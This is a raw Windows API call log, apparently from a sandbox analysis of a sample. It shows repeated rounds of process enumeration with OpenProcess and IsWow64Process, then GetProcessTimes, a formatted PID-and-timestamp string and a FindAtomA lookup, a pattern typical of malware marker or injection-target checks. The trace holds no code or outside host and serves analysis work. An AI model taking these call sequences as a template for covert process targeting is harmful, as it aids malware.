	[0081.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0081.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0081.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0081.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0081.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0081.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0081.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0081.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0081.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0081.028] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0081.028] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0081.028] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0081.028] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0081.028] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0081.028] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0081.028] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x34c
	[0081.028] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.028] CloseHandle (hObject=0x34c) returned 1
	[0081.028] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0081.028] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0081.029] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x34c
	[0081.029] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.029] CloseHandle (hObject=0x34c) returned 1
	[0081.029] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0081.029] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x34c
	[0081.029] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.029] CloseHandle (hObject=0x34c) returned 1
	[0081.029] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x34c
	[0081.029] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.029] CloseHandle (hObject=0x34c) returned 1
	[0081.029] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x34c
	[0081.029] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.029] CloseHandle (hObject=0x34c) returned 1
	[0081.029] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x34c
	[0081.029] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.029] CloseHandle (hObject=0x34c) returned 1
	[0081.030] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x34c
	[0081.030] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.030] CloseHandle (hObject=0x34c) returned 1
	[0081.030] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x34c
	[0081.030] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.030] CloseHandle (hObject=0x34c) returned 1
	[0081.030] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0081.030] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x34c
	[0081.030] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.030] CloseHandle (hObject=0x34c) returned 1
	[0081.030] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x34c
	[0081.030] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.030] CloseHandle (hObject=0x34c) returned 1
	[0081.030] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x34c
	[0081.030] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.030] CloseHandle (hObject=0x34c) returned 1
	[0081.030] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0081.031] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x34c
	[0081.031] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.031] CloseHandle (hObject=0x34c) returned 1
	[0081.031] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x34c
	[0081.031] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.031] CloseHandle (hObject=0x34c) returned 1
	[0081.031] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x34c
	[0081.031] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.031] CloseHandle (hObject=0x34c) returned 1
	[0081.031] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x34c
	[0081.031] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.031] CloseHandle (hObject=0x34c) returned 1
	[0081.031] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x34c
	[0081.031] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.031] CloseHandle (hObject=0x34c) returned 1
	[0081.031] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x34c
	[0081.031] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.031] CloseHandle (hObject=0x34c) returned 1
	[0081.032] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x34c
	[0081.032] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.032] CloseHandle (hObject=0x34c) returned 1
	[0081.032] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x34c
	[0081.032] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.032] CloseHandle (hObject=0x34c) returned 1
	[0081.032] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x34c
	[0081.032] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.032] CloseHandle (hObject=0x34c) returned 1
	[0081.032] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x34c
	[0081.032] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.032] CloseHandle (hObject=0x34c) returned 1
	[0081.032] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x34c
	[0081.032] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.032] CloseHandle (hObject=0x34c) returned 1
	[0081.032] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x34c
	[0081.032] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.032] CloseHandle (hObject=0x34c) returned 1
	[0081.033] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x34c
	[0081.033] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.033] CloseHandle (hObject=0x34c) returned 1
	[0081.033] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x34c
	[0081.033] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.033] CloseHandle (hObject=0x34c) returned 1
	[0081.033] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x34c
	[0081.033] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.033] CloseHandle (hObject=0x34c) returned 1
	[0081.033] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x34c
	[0081.033] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.033] CloseHandle (hObject=0x34c) returned 1
	[0081.033] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x34c
	[0081.033] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.033] CloseHandle (hObject=0x34c) returned 1
	[0081.033] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x34c
	[0081.033] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.033] CloseHandle (hObject=0x34c) returned 1
	[0081.033] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x34c
	[0081.034] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.034] CloseHandle (hObject=0x34c) returned 1
	[0081.034] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x34c
	[0081.034] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.034] CloseHandle (hObject=0x34c) returned 1
	[0081.034] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x34c
	[0081.034] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0081.034] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0081.034] GetProcessTimes (in: hProcess=0x34c, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0081.034] wsprintfA (in: param_1=0x73be78, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0081.035] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0081.035] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0081.035] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0081.035] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0081.035] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0081.035] CloseHandle (hObject=0x34c) returned 1
	[0081.035] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0081.035] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0081.035] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x34c
	[0081.035] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.035] CloseHandle (hObject=0x34c) returned 1
	[0081.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0081.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0081.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0081.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0081.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0081.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0081.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0081.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0081.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0081.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0081.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0081.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0081.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0081.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0081.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0081.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0081.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0081.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0081.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x34c
	[0081.107] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.107] CloseHandle (hObject=0x34c) returned 1
	[0081.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0081.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0081.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x34c
	[0081.107] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.107] CloseHandle (hObject=0x34c) returned 1
	[0081.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0081.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x34c
	[0081.107] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.107] CloseHandle (hObject=0x34c) returned 1
	[0081.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x34c
	[0081.108] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.108] CloseHandle (hObject=0x34c) returned 1
	[0081.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x34c
	[0081.108] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.108] CloseHandle (hObject=0x34c) returned 1
	[0081.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x34c
	[0081.108] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.108] CloseHandle (hObject=0x34c) returned 1
	[0081.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x34c
	[0081.108] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.108] CloseHandle (hObject=0x34c) returned 1
	[0081.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x34c
	[0081.108] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.108] CloseHandle (hObject=0x34c) returned 1
	[0081.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0081.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x34c
	[0081.108] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.108] CloseHandle (hObject=0x34c) returned 1
	[0081.109] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x34c
	[0081.109] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.109] CloseHandle (hObject=0x34c) returned 1
	[0081.109] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x34c
	[0081.109] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.109] CloseHandle (hObject=0x34c) returned 1
	[0081.109] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0081.109] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x34c
	[0081.109] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.109] CloseHandle (hObject=0x34c) returned 1
	[0081.109] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x34c
	[0081.109] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.109] CloseHandle (hObject=0x34c) returned 1
	[0081.109] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x34c
	[0081.109] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.109] CloseHandle (hObject=0x34c) returned 1
	[0081.110] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x34c
	[0081.110] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.110] CloseHandle (hObject=0x34c) returned 1
	[0081.110] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x34c
	[0081.110] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.110] CloseHandle (hObject=0x34c) returned 1
	[0081.110] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x34c
	[0081.110] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.110] CloseHandle (hObject=0x34c) returned 1
	[0081.110] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x34c
	[0081.110] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.110] CloseHandle (hObject=0x34c) returned 1
	[0081.110] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x34c
	[0081.110] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.110] CloseHandle (hObject=0x34c) returned 1
	[0081.110] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x34c
	[0081.110] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.110] CloseHandle (hObject=0x34c) returned 1
	[0081.110] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x34c
	[0081.110] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.111] CloseHandle (hObject=0x34c) returned 1
	[0081.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x34c
	[0081.111] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.111] CloseHandle (hObject=0x34c) returned 1
	[0081.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x34c
	[0081.111] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.111] CloseHandle (hObject=0x34c) returned 1
	[0081.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x34c
	[0081.111] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.111] CloseHandle (hObject=0x34c) returned 1
	[0081.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x34c
	[0081.111] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.111] CloseHandle (hObject=0x34c) returned 1
	[0081.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x34c
	[0081.111] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.111] CloseHandle (hObject=0x34c) returned 1
	[0081.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x34c
	[0081.111] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.111] CloseHandle (hObject=0x34c) returned 1
	[0081.112] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x34c
	[0081.112] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.112] CloseHandle (hObject=0x34c) returned 1
	[0081.112] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x34c
	[0081.112] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.112] CloseHandle (hObject=0x34c) returned 1
	[0081.112] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x34c
	[0081.112] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.112] CloseHandle (hObject=0x34c) returned 1
	[0081.112] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x34c
	[0081.112] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.112] CloseHandle (hObject=0x34c) returned 1
	[0081.112] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x34c
	[0081.113] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0081.113] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0081.113] GetProcessTimes (in: hProcess=0x34c, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0081.113] wsprintfA (in: param_1=0x73be78, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0081.113] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0081.113] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0081.113] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0081.113] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0081.114] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0081.114] CloseHandle (hObject=0x34c) returned 1
	[0081.114] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0081.114] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0081.114] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x34c
	[0081.114] IsWow64Process (in: hProcess=0x34c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.114] CloseHandle (hObject=0x34c) returned 1
	[0081.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0081.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0081.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0081.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0081.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0081.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0081.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0081.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0081.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0081.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0081.185] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0081.185] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0081.185] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0081.185] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0081.185] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0081.185] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0081.185] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0081.185] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0081.185] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x35c
	[0081.185] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.185] CloseHandle (hObject=0x35c) returned 1
	[0081.186] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0081.186] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0081.186] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x35c
	[0081.186] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.186] CloseHandle (hObject=0x35c) returned 1
	[0081.186] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
